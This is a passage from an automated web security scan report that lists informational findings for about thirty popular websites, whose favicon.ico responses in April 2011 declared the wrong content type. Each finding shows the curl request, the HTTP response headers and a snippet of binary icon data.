..............h.......(....... ....................................k...........q...................n...w...............t...........z...............l...........m...v...........s.......|...y.......m...v
...[SNIP]...

27.153. http://www.ourstage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ourstage.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourstage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:46 GMT
Server: haproxy
Last-Modified: Fri, 03 Jul 2009 01:23:45 GMT
ETag: "10261-57e-46dc301e9ea40"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................>.......d3..!.}.-.Q.4.......nB....r.    .#.%.....k...S...(...<.................1...+...Z%.......p..*.......U@..9............b..kQ....I...
...[SNIP]...

27.154. http://www.ovguide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ovguide.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ovguide.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 09 Nov 2010 01:42:39 GMT
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .............................P7.OP7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7.O....P7.OP7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7..P7.OP7..7%....
...[SNIP]...

27.155. http://www.partypoker.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.partypoker.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.partypoker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 07 Oct 2010 12:02:08 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:33:48 GMT
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1) gen true for "http://tracker.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1))
Keep-Alive: timeout=5, max=89
Content-Type: text/plain
Connection: Keep-Alive
Date: Sat, 02 Apr 2011 13:37:52 GMT
Age: 0
Content-Length: 1150

............ .h.......(....... ..... .............................................jjj.'''.........""".ddd.................................jjj.......3..H...........O.......&H.gln.....................AA
...[SNIP]...

27.156. http://www.payless.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.payless.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.payless.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server:
Last-Modified: Fri, 28 Jan 2011 18:40:12 GMT
ETag: "47e-49aec65757b00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:45:48 GMT
Connection: close

............ .h.......(....... ..... ............................................@...........................A..........................................................................................
...[SNIP]...

27.157. http://www.pctools.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pctools.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pctools.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 31 Aug 2008 23:34:49 GMT
ETag: "73e3a8-57e-455c9eebd1840"
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: HIT from www3.pctools.com:8080
Date: Sat, 02 Apr 2011 13:43:49 GMT
Content-Length: 1406
Connection: close

..............h.......(....... .................................\...............6.......M...G...H...[.......5.......U...........X...J...3...k...i...W...O.......?...i...W...|...............K...K.......
...[SNIP]...

27.158. http://www.phoenix.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.phoenix.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phoenix.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:55 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 21:49:33 GMT
ETag: "47e-44c9d540"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding

............ .h.......(....... ..... ................................................M.......I....&&.....+........................................,,.....x....PP.........<..............................
...[SNIP]...

27.159. http://www.phoneagentsource.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.phoneagentsource.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phoneagentsource.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:54 GMT
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Wed, 09 Mar 2011 07:44:32 GMT
Content-Length: 17542
X-Varnish: 723278010 723267690
Age: 72
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

......00.... ..%..F... .... ......%........ ..    ...6........ .h....@..(...0...`..... ......%......................................................................@@@.@@@.@@@.@@@+@@@2@@@3@@@3@@@3@@@3@@
...[SNIP]...

27.160. http://www.pittsburghlive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pittsburghlive.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pittsburghlive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:00 GMT
Server: Apache/2.2.3 (Red Hat) PHP/5.1.6
Last-Modified: Fri, 11 Mar 2011 14:45:55 GMT
Accept-Ranges: bytes
Content-Length: 894
Vary: Accept-Encoding,User-agent
Content-Type: text/plain

..............h.......(....... ..................................................................................DFG?>@TSU}|.mlp......RPO.........SSSA@D65>......(*+.........87;.........WYS......372...
...[SNIP]...

27.161. http://www.playfin.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.playfin.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playfin.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:51 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 23:46:03 GMT
ETag: "1cf1121-47e-49c83001704c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................................................................................q;..{`..s..aO
.<'...........................................x
...[SNIP]...

27.162. http://www.playstation.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.playstation.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playstation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:59 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 06:59:39 GMT
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain

..............h...&... ..............(....... ...........@...............................@@B.........!!#.....bbc.........PPP.....qqr.....223.....YY[.......
.....................yyz.GGH.............;;
...[SNIP]...

27.163. http://www.playsushi.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.playsushi.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playsushi.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:50 GMT
Server: Apache
Last-Modified: Fri, 05 Jun 2009 18:08:30 GMT
ETag: "1d98c58-57e-46b9dc79f8380"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=7257600
Expires: Sat, 02 Apr 2011 18:34:50 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@...........................3Q..........9~......:...*e..eee.8..............................HBL.........999.:::.........!!!.7...7...    ...........6.......3G
...
...[SNIP]...

27.164. http://www.politico.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.politico.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.politico.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Mon, 17 Mar 2008 15:14:07 GMT
ETag: "ffc38-37e-7898edc0"
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 13:31:55 GMT
Date: Sat, 02 Apr 2011 13:26:55 GMT
Content-Length: 894
Connection: close

..............h.......(....... ..........................................................................................................................................._Z....rm......................
...[SNIP]...

27.165. http://www.polyvore.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.polyvore.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.polyvore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Polyvore Web Server
Date: Sat, 02 Apr 2011 13:41:52 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Fri, 01 Apr 2011 21:25:48 GMT
Accept-Ranges: bytes
Content-Length: 894

..............h.......(....... ...........................................................................................................................................@@@@@@........................
...[SNIP]...

27.166. http://www.popsugar.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.popsugar.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popsugar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 294
Date: Sat, 02 Apr 2011 13:59:05 GMT
Connection: close

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`....Lm...|j..h..R..\E.#....c.c8.f.(. ..H..@.>.r....#if.......P@Z......M#6.r.. ~...Y..z......(;..... 5..4......H.G.!`.(
...[SNIP]...

27.167. http://www.poptropica.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.poptropica.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.poptropica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Connection: Keep-Alive
Date: Thu, 09 Dec 2010 19:11:15 GMT
Server: TUX/2.0 (Linux)
Content-Length: 3638
Accept-Ranges: bytes
Last-Modified: Thu, 18 Nov 2010 18:53:19 GMT

..............h...&... ..............(....... ...........@.....................................P.......q.......7......._...............e.......H...'.......[...T...............0.......A...............
...[SNIP]...

27.168. http://www.potterybarn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.potterybarn.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.potterybarn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"1406-1301028802000"
Last-Modified: Fri, 25 Mar 2011 04:53:22 GMT
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:56:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:56:58 GMT
Connection: close
Set-Cookie: PBDPWWW-EC=R4233321340; expires=Sun, 03-Apr-2011 14:02:10 GMT; domain=.potterybarn.com; path=/
Set-Cookie: WSPFY=179ed7406c5f00002a2b974dde5e000099500000; expires=Mon, 1-Jan-2024 00:00:01 GMT; path=/; domain=.potterybarn.com

..............h.......(....... .......................................................


..................................+++.333.666.888.<<<.JJJ.NNN.QQQ.RRR.TTT.UUU.VVV.WWW.XXX.aaa.jjj...........
...[SNIP]...

27.169. http://www.prlog.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.prlog.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prlog.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:48 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 18:45:31 GMT
ETag: "1dd82fa-13e-49c061a4048c0"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...

27.170. http://www.pronto.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:43 GMT
Server: Apache/2.2.4 (Fedora)
Set-Cookie: JSESSIONID=612608DD194E2650C96F7544861E8212; Path=/
Set-Cookie: SESSIONID=1390698434; Domain=.pronto.com; Path=/
Set-Cookie: abt=ProntoV3_5_7-1.185-cellNum_2; Domain=.pronto.com; Expires=Mon, 02-May-2011 13:23:43 GMT; Path=/
Set-Cookie: M_ID=-4f77939a-12f1647631d-28ef; Domain=.pronto.com; Expires=Mon, 01-Apr-2013 13:23:43 GMT; Path=/
Set-Cookie: V_ID=-4f77939a-12f1647631d-28f0; Domain=.pronto.com; Path=/
ETag: W/"1150-1273607942000"
Last-Modified: Tue, 11 May 2010 19:59:02 GMT
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Via: CN-5000
Proxy-Connection: Keep-Alive

............ .h.......(....... ..... .....@.............................................`3..........................................................b...[...[6..........................................
...[SNIP]...

27.171. http://www.qualityhealth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.qualityhealth.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qualityhealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 22 Nov 2008 02:06:45 GMT
ETag: "57e-45c3d9d14f740"
Accept-Ranges: bytes
Content-Length: 1406
P3P: policyref="http://www.qualityhealth.com/p3p/p3p.xml", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:51:41 GMT
Connection: close
Set-Cookie: AKAMAIID=a4f3f748bb190000ed29974d961f070061ac0000; path=/; domain=www.qualityhealth.com

..............h.......(....... ........................................}g......mT.......p.K........lR..........v_..........w`......rY.......{......hN.....=.............................................
...[SNIP]...

27.172. http://www.radaronline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.radaronline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radaronline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 45
Expires: Sat, 02 Apr 2011 13:31:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:31:28 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:28 GMT; path=/
Vary: User-Agent

The requested file favicon.ico was not found.

27.173. http://www.rawtube.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rawtube.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rawtube.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 22 Jul 2010 19:59:31 GMT
ETag: "9472-47e-48bff5b44cec0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150
Via: www.rawtube.com
Date: Sat, 02 Apr 2011 12:32:30 GMT
X-Varnish: 863747183 863502929
Age: 971
Via: 1.1 varnish
Connection: keep-alive

............ .h.......(....... ..... .............................................................................................................mm..........................00........................
...[SNIP]...

27.174. http://www.real.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.real.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.real.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:42 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 17:43:29 GMT
ETag: "47e-49104ea9e9240"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Connection: close

............ .h.......(....... ..... ............................................    0..........x.................................................c.    .Y...V..E'    ...........................................
...[SNIP]...

27.175. http://www.rei.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rei.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rei.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 21 May 2008 17:54:55 GMT
P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV"
Content-Type: text/plain; charset=UTF-8
Content-Language: en-US
Cache-Control: public, must-revalidate, max-age=86400
Date: Sat, 02 Apr 2011 13:55:40 GMT
Content-Length: 1406
Connection: close

..............h.......(....... ...........@...........................s.s.*b*.............T{T.....<k<.....c.c.............HqH. Y .........3f3.........o.o...Y|Y.&^&.............FoF.q.q...............
...[SNIP]...

27.176. http://www.rollingstone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rollingstone.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rollingstone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Mar 2011 12:23:33 GMT
ETag: "130116e-37e-49f8a03173b40"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8
Server: Apache (Unix;)
Cache-Control: private, max-age=575
Date: Sat, 02 Apr 2011 13:55:16 GMT
Connection: close

..............h.......(....... ...............................!.. ..!..!..!.....!..!........#.....!..-*............. ........ ..!..!..".."........up.......... ..!..-*.\U.XU.[T.XU.VU.,). ..#..uq.......
...[SNIP]...

27.177. http://www.rottentomatoes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rottentomatoes.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rottentomatoes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:06 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 23:24:02 GMT
ETag: "423e"
Accept-Ranges: bytes
Content-Length: 16958
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:33:06 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

......@@.... .(B......(...@......... ......B......................................................................................................................... ...@............................
...[SNIP]...

27.178. http://www.rushlimbaugh.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rushlimbaugh.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rushlimbaugh.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 01 Apr 2011 19:42:22 GMT
ETag: "72e410-3aee-9bc96380"
Accept-Ranges: bytes
Content-Length: 15086
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:05:47 GMT
Connection: close

..............h...6... ..............00.......%..F...(....... ..... .....@.............................................................................................................O..e..o...7C...
...[SNIP]...

27.179. http://www.salon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.salon.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.salon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:16 GMT
Server: Apache
Last-Modified: Mon, 14 Sep 2009 06:24:07 GMT
ETag: "2fe"
Accept-Ranges: bytes
Content-Length: 766
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:40:16 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...... ..............(... ...@...............................................FEF.............uvu.?A..+-+.om...... ......[\[...................................................33333333.wy30...33333333
...[SNIP]...

27.180. http://www.samsung.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.samsung.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.samsung.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 16
Date: Sat, 02 Apr 2011 13:43:30 GMT
Connection: close

Object not found

27.181. http://www.shutterfly.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.shutterfly.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shutterfly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:59 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"2862-1172715710000"
Last-Modified: Thu, 01 Mar 2007 02:21:50 GMT
Content-Length: 2862
Set-Cookie: lb=0FEyVLc8-app224; Path=/
Set-Cookie: BIGipServerAPP-B-LR=1802571948.20480.0000; path=/
Content-Type: text/plain

..............(...6...........h...^......... .h.......(....... ................................................................................................."......n.`.f`...........................
...[SNIP]...

27.182. http://www.smarter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smarter.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smarter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

